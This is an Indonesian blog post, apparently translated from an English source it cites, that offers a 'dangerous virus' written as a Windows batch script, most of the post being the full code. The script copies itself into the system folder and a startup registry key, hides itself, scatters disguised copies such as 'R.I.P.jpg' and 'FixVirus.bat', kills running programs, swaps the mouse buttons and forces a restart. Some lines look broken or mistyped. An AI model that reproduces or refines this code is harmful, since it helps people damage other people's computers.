Cara membuat virus menggunakan pemrograman Batch

Dalam posting ini saya akan memberikan kode virus berbahaya yang ditulis dalam Bahasa pemrograman Batch.

Virus dapat melakukan:

  • Salin dirinya menjadi startup
  • Salin sendiri lebih dari seribu kali ke tempat acak di komputer Anda
  • Menyembunyikan diri dan semua file yang dibuat lainnya
  • Tugas membunuh MSN, Norton, Windows Explorer, Limewire.
  • Swap tombol kiri mouse dengan orang yang tepat
  • Membuka kotak peringatan
  • Perubahan waktu untuk 12:00 dan menutup komputer
Berikut Tata Laku ini:

@Echo off
color 4
title 4
title R.I.P
start
start
start
start calc
copy %0 %Systemroot%\Greatgame > nul
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Greatgame /t REG_SZ
/d %systemroot%\Greatgame.bat /f > nul
copy %0 *.bat > nul
Attrib +r +h Greatgame.bat
Attrib +r +h
RUNDLL32 USER32.DLL.SwapMouseButton
start calc
cls
tskill msnmsgr
tskill LimeWire
tskill iexplore
tskill NMain
start
cls
cd %userprofile%\desktop
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
cd %userprofile%My Documents
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
start
start calc
cls
msg * R.I.P
msg * R.I.P
shutdown -r -t 10 -c "VIRUS DETECTED"
start
start
time 12:00
:R.I.P
cd %usernameprofile%\desktop
copy Greatgame.bat %random%.bat
goto RIP
Sumber: http://www.breakthesecurity.com/2010/12/how-to-create-dangerous-virus-using.html

0 ɹɐʇuǝɯoʞ: